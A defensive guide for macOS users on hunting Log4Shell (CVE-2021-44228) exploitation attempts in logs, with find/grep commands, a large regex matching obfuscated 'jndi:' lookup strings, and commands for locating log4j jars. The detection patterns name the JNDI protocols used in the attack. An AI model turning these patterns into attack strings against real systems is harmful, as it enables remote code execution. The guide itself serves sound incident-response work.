You can use these commands and rules to search for exploitation attempts against log4j RCE vulnerability CVE-2021-44228 in a MacOS using ZSH.
Based on https://gist.github.com/Neo23x0/e4c8b03ff8cdf1fa63b7d15db6e3860b
This command searches for exploitation attempts in uncompressed files in folder /var/log
and all sub folders.
It overrides your user locale to make sure the command works. More about it here
sudo find /var/log/ -type f -exec sh -c "cat {} | LC_ALL=C sed -e 's/\${lower://'g | LC_ALL=C tr -d '}' | egrep -I -i 'jndi:(ldap[s]?|rmi|dns|nis|iiop|corba|nds|http):'" \;
This command searches for exploitation attempts in compressed files in folder /var/log
and all sub folders,
using gzcat (instead of zcat)
sudo find /var/log/ -name '*.gz' -type f -exec sh -c "gzcat {} | sed -e 's/\${lower://'g | tr -d '}' | egrep -i 'jndi:(ldap[s]?|rmi|dns|nis|iiop|corba|nds|http):'" \;
If any of these return some results, your laptop may have been attacked. Jump directly to mitigation strategies (or contact someone that can help you).
A massive regex to cover even the most obfuscated variants: https://github.com/back2root/log4shell-rex. If the previous commands don't return any matches, you may want to try out this regex, just in case.
(?:\$|%(?:25)*24|\\(?:0024|0{0,2}44))(?:{|%(?:25)*7[Bb]|\\(?:007[Bb]|0{0,2}173)).{0,30}?((?:[Jj]|%(?:25)*[46][Aa]|\\(?:00[46][Aa]|0{0,2}1[15]2)).{0,30}?(?:[Nn]|%(?:25)*[46][Ee]|\\(?:00[46][Ee]|0{0,2}1[15]6)).{0,30}?(?:[Dd]|%(?:25)*[46]4|\\(?:00[46]4|0{0,2}1[04]4)).{0,30}?(?:[Ii]|%(?:25)*[46]9|\\(?:00[46]9|0{0,2}1[15]1)|ı).{0,30}?(?::|%(?:25)*3[Aa]|\\(?:003[Aa]|0{0,2}72)).{0,30}?((?:[Ll]|%(?:25)*[46][Cc]|\\(?:00[46][Cc]|0{0,2}1[15]4)).{0,30}?(?:[Dd]|%(?:25)*[46]4|\\(?:00[46]4|0{0,2}1[04]4)).{0,30}?(?:[Aa]|%(?:25)*[46]1|\\(?:00[46]1|0{0,2}1[04]1)).{0,30}?(?:[Pp]|%(?:25)*[57]0|\\(?:00[57]0|0{0,2}1[26]0))(?:.{0,30}?(?:[Ss]|%(?:25)*[57]3|\\(?:00[57]3|0{0,2}1[26]3)))?|(?:[Rr]|%(?:25)*[57]2|\\(?:00[57]2|0{0,2}1[26]2)).{0,30}?(?:[Mm]|%(?:25)*[46][Dd]|\\(?:00[46][Dd]|0{0,2}1[15]5)).{0,30}?(?:[Ii]|%(?:25)*[46]9|\\(?:00[46]9|0{0,2}1[15]1)|ı)|(?:[Dd]|%(?:25)*[46]4|\\(?:00[46]4|0{0,2}1[04]4)).{0,30}?(?:[Nn]|%(?:25)*[46][Ee]|\\(?:00[46][Ee]|0{0,2}1[15]6)).{0,30}?(?:[Ss]|%(?:25)*[57]3|\\(?:00[57]3|0{0,2}1[26]3))|(?:[Nn]|%(?:25)*[46][Ee]|\\(?:00[46][Ee]|0{0,2}1[15]6)).{0,30}?(?:[Ii]|%(?:25)*[46]9|\\(?:00[46]9|0{0,2}1[15]1)|ı).{0,30}?(?:[Ss]|%(?:25)*[57]3|\\(?:00[57]3|0{0,2}1[26]3))|(?:.{0,30}?(?:[Ii]|%(?:25)*[46]9|\\(?:00[46]9|0{0,2}1[15]1)|ı)){2}.{0,30}?(?:[Oo]|%(?:25)*[46][Ff]|\\(?:00[46][Ff]|0{0,2}1[15]7)).{0,30}?(?:[Pp]|%(?:25)*[57]0|\\(?:00[57]0|0{0,2}1[26]0))|(?:[Cc]|%(?:25)*[46]3|\\(?:00[46]3|0{0,2}1[04]3)).{0,30}?(?:[Oo]|%(?:25)*[46][Ff]|\\(?:00[46][Ff]|0{0,2}1[15]7)).{0,30}?(?:[Rr]|%(?:25)*[57]2|\\(?:00[57]2|0{0,2}1[26]2)).{0,30}?(?:[Bb]|%(?:25)*[46]2|\\(?:00[46]2|0{0,2}1[04]2)).{0,30}?(?:[Aa]|%(?:25)*[46]1|\\(?:00[46]1|0{0,2}1[04]1))|(?:[Nn]|%(?:25)*[46][Ee]|\\(?:00[46][Ee]|0{0,2}1[15]6)).{0,30}?(?:[Dd]|%(?:25)*[46]4|\\(?:00[46]4|0{0,2}1[04]4)).{0,30}?(?:[Ss]|%(?:25)*[57]3|\\(?:00[57]3|0{0,2}1[26]3))|(?:[Hh]|%(?:25)*[46]8|\\(?:00[46]8|0{0,2}1[15]0))(?:.{0,30}?(?:[Tt]|%(?:25)*[57]4|\\(?:00[57]4|0{0,2}1[26]4))){2}.{0,30}?(?:[Pp]|%(?:25)*[57]0|\\(?:00[57]0|0{0,2}1[26]0))(?:.{0,30}?(?:[Ss]|%(?:25)*[57]3|\\(?:00[57]3|0{0,2}1[26]3)))?).{0,30}?(?::|%(?:25)*3[Aa]|\\(?:003[Aa]|0{0,2}72)).{0,30}?(?:\/|%(?:25)*2[Ff]|\\(?:002[Ff]|0{0,2}57)|\${)|(?:[Bb]|%(?:25)*[46]2|\\(?:00[46]2|0{0,2}1[04]2)).{0,30}?(?:[Aa]|%(?:25)*[46]1|\\(?:00[46]1|0{0,2}1[04]1)).{0,30}?(?:[Ss]|%(?:25)*[57]3|\\(?:00[57]3|0{0,2}1[26]3)).{0,30}?(?:[Ee]|%(?:25)*[46]5|\\(?:00[46]5|0{0,2}1[04]5)).{2,60}?(?::|%(?:25)*3[Aa]|\\(?:003[Aa]|0{0,2}72))(JH[s-v]|[\x2b\x2f-9A-Za-z][CSiy]R7|[\x2b\x2f-9A-Za-z]{2}[048AEIMQUYcgkosw]ke[\x2b\x2f-9w-z]))
To use this regex on a MacOS, make sure you have installed the GNU grep implementation (instead of the default FreeBSD grep implementation that comes with MacOS). If you don't have it, you can install it with brew:
brew install grep
Installing it in that way will not change your grep, but will add a ggrep command (the gnu one) so you can use both and the behavior of your existing scripts will not be affected.
Now you can execute, for example:
sudo find /var/log -name "*.log" | xargs ggrep -P 'REGEX-FROM-HELL-GOES-HERE'
Python based scanner to detect the most obfuscated forms of the exploit codes. Again, if the first two commands don't shed any results, you can also try this one
https://github.com/Neo23x0/log4shell-detector
Lookup for log4j files in your Mac with these
ps aux | egrep '[l]og4j'
sudo find / -iname "log4j*"
lsof | grep log4j
grep -r --include *.[wj]ar "JndiLookup.class" / 2>&1 | grep matches
Most probably, for many of the resulted locations, you can just delete the log4j files because they are within
a cache folder (/.../.gradle/caches/...
for instance), trash folder or downloaded dependencies from a project
(like /.../.m2/repository/log4j
) that you can download again (making sure you upgrade to the latest version with a patch).
If you are not sure, ask for help.
If runnig some of these commands you get 'Operation not permitted' messages, it's probably fine.
MacOS from versions 10.11 onward come with System Integrity Protection feature that precisely protects some directories in order to prevent the OS from being compromised by malicious code.
So if you get 'Operation not permitted' outputs in one of these folders, that's actually good:
/System
/sbin
/bin
/usr (with the exception of /usr/local subdirectory)
/Applications for apps that are preinstalled with Mac OS (Terminal, Safari, etc)
If you get the message for other directories, it could be because the Terminal doesn't have full right access.
You can grant it under Security & Privacy settings, restart the terminal and run the script again. You can revert it after running it.
Detailed step by steps here.
Note: if you are using iTerm, granting access to Terminal should do it, because it uses macOS Terminal underneath.
You may also get 'No such file or directory' inside /System/Volumes/
.
Don't worry about those, they're probably files listed as volumes but not really mounted.
If non of the previous steps show any issue, you are good to go :)
Yara is a malware detector that uses rules to find it. These rules are stored in .yar files like this one for the log4j vulnerability. Apart from Yara itself, other scanners use the Yara engine, and usually just putting the file with the rule in a specific folder the scanner will be able to detect that specific malware. In case you are using a scanner like that in your projects, you can use that file. Of course, in case you want to try, you can download the latest release of Yara from here
I'm merely compiling findings and tips provided by Jonathan Fernández (Thoughtworks Spain Infosec Lead).
Thank you!